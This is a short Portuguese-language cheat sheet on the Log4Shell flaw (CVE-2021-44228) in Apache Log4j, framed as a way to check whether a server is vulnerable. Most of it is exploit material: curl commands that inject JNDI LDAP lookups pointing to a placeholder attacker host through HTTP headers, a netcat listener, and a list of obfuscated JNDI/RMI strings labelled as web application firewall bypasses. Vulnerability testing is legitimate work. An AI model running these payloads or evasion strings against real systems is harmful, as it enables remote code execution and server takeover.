
CVE-2021-44228
Em 5 de dezembro de 2021, a Apache identificou uma vulnerabilidade (posteriormente identificada como CVE-2021-44228) em seu amplamente utilizado serviço de logging Log4j. A vulnerabilidade, também conhecida como Log4shell, permite que invasores obtenham controle total de servidores afetados ao permitir execução remota de código não autenticada se o usuário estiver executando uma aplicação que utiliza a biblioteca de logging Java. O Log4j está fortemente integrado em um amplo conjunto de frameworks devops, sistemas de TI empresariais, software de fornecedores e produtos em nuvem.
Execute o seguinte no host remoto malicioso para verificar se seu servidor está vulnerável à exploração do Log4j
curl vulnserver:port -H 'X-Api-Version: ${jndi:ldap://malicioushost:mport/a}'
nc -lnvp mport
Outras variações que envolvem uma requisição HTTP-POST podem ser usadas para verificar a vulnerabilidade
curl -H 'User-Agent: ${jndi:ldap://malicioushost:mport/a}' vulnserver:port
Para contornar o firewall da aplicação web
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}